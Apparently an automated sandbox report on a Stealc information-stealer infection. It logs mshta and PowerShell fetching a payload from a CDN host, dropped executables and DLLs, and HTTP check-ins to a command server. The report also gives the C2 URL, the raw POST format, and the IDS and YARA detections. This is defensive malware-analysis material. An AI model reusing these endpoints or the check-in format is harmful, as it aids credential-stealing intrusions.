              Source: Binary string: BitLockerToGo.pdbGCTL source: 0SmartAssem.exe, 00000008.00000003.1981482070.0000022BEFA80000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000003.1981404969.0000022BEFD30000.00000004.00001000.00020000.00000000.sdmp, 0SmartAssem.exe, 00000008.00000002.1998133835.000000C0004BB000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll.5.dr
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://193.176.153.234/587ec30955d49a9c.php
              Source: global trafficHTTP traffic detected: GET /smart1.zip HTTP/1.1Host: bidvertiser.b-cdn.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.176.153.234Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /587ec30955d49a9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 193.176.153.234Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 45 44 33 43 31 39 30 41 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="hwid"27ED3C190AC22312027626------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build"cr3------BGHJJDGHCBGDHIECBGID--
              Source: Joe Sandbox ViewIP Address: 185.93.1.250 185.93.1.250
              Source: Joe Sandbox ViewASN Name: AGROSVITUA AGROSVITUA
              Source: Joe Sandbox ViewASN Name: CDN77GB CDN77GB
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /smart1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bidvertiser.b-cdn.netConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownTCP traffic detected without corresponding DNS query: 193.176.153.234
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_030562D0 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,11_2_030562D0
              Source: global trafficHTTP traffic detected: GET /smart1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bidvertiser.b-cdn.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /smart1.zip HTTP/1.1Host: bidvertiser.b-cdn.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.176.153.234Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: bidvertiser.b-cdn.net
              Source: unknownHTTP traffic detected: POST /587ec30955d49a9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 193.176.153.234Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 45 44 33 43 31 39 30 41 43 32 32 33 31 32 30 32 37 36 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 72 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="hwid"27ED3C190AC22312027626------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build"cr3------BGHJJDGHCBGDHIECBGID--
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49743 -> 193.176.153.234:80
              Source: Network trafficSuricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 185.93.1.250:443 -> 192.168.2.4:49730
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/587ec30955d49a9c.php
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/587ec30955d49a9c.php/
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/587ec30955d49a9c.php0
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/587ec30955d49a9c.phpD
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/587ec30955d49a9c.phpl
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/587ec30955d49a9c.phpx
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/:
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234/X
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.2348:
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.176.153.234;
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: svchost.exe, 00000004.00000002.2966543724.00000209D8600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D8378000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D8378000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D8378000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D83AD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: powershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.1728419864.000001E7E16CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1922955102.000001EC259C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 00000000.00000002.1728419864.000001E7E1683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000000.00000002.1728419864.000001E7E169E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1723184426.00000222DA6AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1922955102.000001EC259C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net
              Source: mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/F
              Source: mshta.exe, 00000003.00000003.2358841397.0000022F6711B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369402329.0000022F6711B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/h#
              Source: mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369835096.0000022F67400000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369176557.0000022F67070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1
              Source: mshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1(i
              Source: mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1...
              Source: mshta.exe, 00000003.00000003.2366620634.0000023769CA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2370751127.0000023769CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1...r#
              Source: powershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1.zipp
              Source: mshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart10
              Source: mshta.exe, 00000003.00000002.2371500355.000002376BE90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2366801672.000002376BE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1:asLMEMPx
              Source: mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369176557.0000022F67070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1C:
              Source: mshta.exe, 00000003.00000002.2369176557.0000022F67077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1D
              Source: mshta.exe, 00000003.00000002.2369149756.0000022F67060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1H
              Source: mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1I9
              Source: mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1OOC:
              Source: mshta.exe, 00000003.00000002.2371901544.000002376E1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1U
              Source: mshta.exe, 00000003.00000002.2369835096.0000022F67400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1_BROWSER_APP_B
              Source: mshta.exe, 00000003.00000002.2369290267.0000022F670B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2367255449.0000022F670B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1c9x
              Source: mshta.exe, 00000003.00000002.2369176557.0000022F67098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1entV
              Source: mshta.exe, 00000003.00000003.2365006534.000002376D0B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1https://bidvertiser.b-cdn.net/smart1
              Source: mshta.exe, 00000003.00000002.2369326741.0000022F670E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bidvertiser.b-cdn.net/smart1m
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000005.00000002.1922955102.000001EC25BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: mshta.exe, 00000003.00000002.2369402329.0000022F6710A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: svchost.exe, 00000004.00000003.1732947947.00000209D8422000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: 0SmartAssem.exeString found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictduration
              Source: VBoxSharedClipboard.dll.5.dr, Qt5SqlVBox.dll.5.dr, VBoxSharedFolders.dll.5.dr, Qt5PrintSupportVBox.dll.5.dr, VBoxSupLib.dll.5.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: VBoxVMM.dll.5.drString found in binary or memory: https://www.virtualbox.org/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownHTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.93.1.250:443 -> 192.168.2.4:49734 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7336.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: Process Memory Space: powershell.exe PID: 7336, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxSharedFolders.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxVMM.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Qt5SqlVBox.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\0SmartAssem.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VBoxSupLib.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dllJump to dropped file
              Very long command line found
              Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2846
              Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2846Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\VBoxSupLib.dll 34E8BD19A7DD241A1275A3CF77A8A59A7DF1FC529F864F92D8548CC7E0429B26
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 03054610 appears 316 times
              Source: 0SmartAssem.exe.5.drStatic PE information: Number of sections : 12 > 10
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: amsi64_7336.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: Process Memory Space: powershell.exe PID: 7336, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winPS1@14/24@1/3
              Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
